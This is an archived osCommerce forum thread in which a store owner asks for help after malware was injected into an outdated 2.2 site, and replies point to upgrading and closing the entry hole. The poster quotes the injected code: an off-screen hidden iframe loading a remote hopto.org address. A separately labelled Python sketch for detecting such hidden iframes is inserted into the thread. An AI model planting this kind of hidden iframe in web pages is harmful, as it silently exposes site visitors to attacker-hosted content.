FranzderFranke Posted March 23, 2014

Hello,

Today I got a mail from Google AdWords that I have malware on my osCommerce 2.2 RC website. Some malware checker told me the same. I had this problem one year ago. That time I installed an old backup and lots of security plugins - even a nice guy from The UK Waltons looked over it.

Today I reinstalled a SQL backup from yesterday and everything seems fine - the malware checker says it's fine now, too. But I don't know what the problem was. No data from the webspace was changed, so it looks like a malware injection into SQL.

I did 99 % of this: http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-oscommerce-22-site/

I don't have much info about that malware - Kaspersky told me: HEUR:Trojan Script.Generic / AdWords: Malware / Webmaster Tools: Nothing (but this doesn't mean anything because they work slowly).

What should I do now? I am pretty sure this will happen again.

burt Posted March 23, 2014

You should upgrade your old version of osCommerce by nuking it and installing the latest stable version.

FranzderFranke (Author) Posted March 23, 2014

> You should upgrade your old version of osCommerce by nuking it and installing the latest stable version.

But then I have to start from the beginning, and I have lots of plugins for connection to merchandise management programs that don't work with new versions, I think... :(

geoffreywalton Posted March 23, 2014

> I did 99 % of this: http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-oscommerce-22-site/

It might be better to do 100%

Cheers

G

FranzderFranke (Author) Posted March 24, 2014

Now I have more information about the iframe code injection:

    8:< meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
    9:< !-- EOF: Header Tags SEO Generated Meta Tags -->
    10:< base href="http://www.xxx.de/">
    11:< link rel="stylesheet" type="text/css" href="stylesheet.css">
    12:< /head> < style> .hlc4ygqt3 { position:absolute; left:-1174px; top:-1822px} < /style> < div class="hlc4ygqt3"> < iframe src="http://ugrpcfr.hopto.org/zwtzzadbm8tsfklpbl9h3bg9am7pbdvmvy" width="153" height="363"> < /iframe > < /div>
    13:< body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0">
    14:< !-- header //-->

It only got listed by the Bing robot.

By the way, does someone know if the http://sitecheck3.sucuri.net/ firewall is useful?

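An added detection sketch (not part of the thread, and not osCommerce or osC_Sec code): it flags iframes that sit inside an off-screen positioned container or outside `<body>`, the two traits of the block posted above. The function names, the 100px threshold and the sample hosts are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

VOID = {"meta", "link", "base", "br", "img", "input", "hr"}
RULE = re.compile(r"\.([\w-]+)\s*\{([^}]*)\}")           # .class { declarations }
POSITIONED = re.compile(r"position\s*:\s*(absolute|fixed)", re.I)
OFFSCREEN = re.compile(r"(?:left|top)\s*:\s*-\d{3,}", re.I)  # 100px or more off-page

def is_offscreen(css):
    return bool(POSITIONED.search(css) and OFFSCREEN.search(css))

class IframeAudit(HTMLParser):
    def __init__(self, hidden_classes):
        super().__init__()
        self.hidden_classes = hidden_classes
        self.stack = []      # (tag, hidden?) for each open element
        self.findings = []   # (iframe src, reason)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        own = (set((a.get("class") or "").split()) & self.hidden_classes
               or is_offscreen(a.get("style") or ""))
        hidden = bool(own or (self.stack and self.stack[-1][1]))  # inherit from parent
        if tag == "iframe":
            if hidden:
                self.findings.append((a.get("src"), "off-screen container"))
            elif not any(t == "body" for t, _ in self.stack):
                self.findings.append((a.get("src"), "outside <body>"))
        if tag not in VOID:
            self.stack.append((tag, hidden))

    def handle_endtag(self, tag):
        # Pop back to the matching open tag; tolerate unclosed elements.
        for i in reversed(range(len(self.stack))):
            if self.stack[i][0] == tag:
                del self.stack[i:]
                break

def find_hidden_iframes(html):
    hidden = {name for name, body in RULE.findall(html) if is_offscreen(body)}
    audit = IframeAudit(hidden)
    audit.feed(html)
    return audit.findings

# Constructed sample modelled on the injected block in the post (placeholder hosts).
SAMPLE = """<html><head><link rel="stylesheet" href="stylesheet.css"></head>
<style>.x9k2 { position:absolute; left:-1174px; top:-1822px}</style>
<div class="x9k2"><iframe src="http://injected.example/abc" width="153"></iframe></div>
<body><iframe src="https://maps.example/embed"></iframe></body></html>"""
```

Feed it the HTML exactly as a crawler receives it, since the poster reports the iframe showing up only in the Bing view of the page.
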
burt Posted March 24, 2014

It doesn't matter what the code is. The important questions:

1. HOW did it get there.
2. WHAT can I do to stop it happening again.

FranzderFranke (Author) Posted March 24, 2014

Interesting is that the iframe is only injected in Bing / Internet Explorer code.

Do you think a firewall from http://sitecheck3.sucuri.net/ can help me?

iRAY Posted March 27, 2014

It looks more like an IE add-on. That thing with AdWords recently happened to a wide variety of websites - request a re-review.

Taipo Posted March 31, 2014

As 'burt' stated, the content of the hack code is not really important, but rather how the attacker was able to insert that code into a page on your website.

There are two usual methods: one is via a security hole in the web cart, of which there are a few big ones in v2.2, or via a security hole in the webserver that the site is hosted on.

If you are intent on using v2.2, then after cleaning up your website you should install the osCSec addon. http://addons.oscommerce.com/info/8929

Taipo Posted April 14, 2014

The other point that needs to be stressed is that some shared hosting services are notorious for crap security on their servers. It is luck of the draw whether you get a good one; many of the free hosting sites have little security and rely on suspending your free site, rather than fixing their security issues, as their primary means of dealing with being hacked.

This topic is now archived and is closed to further replies.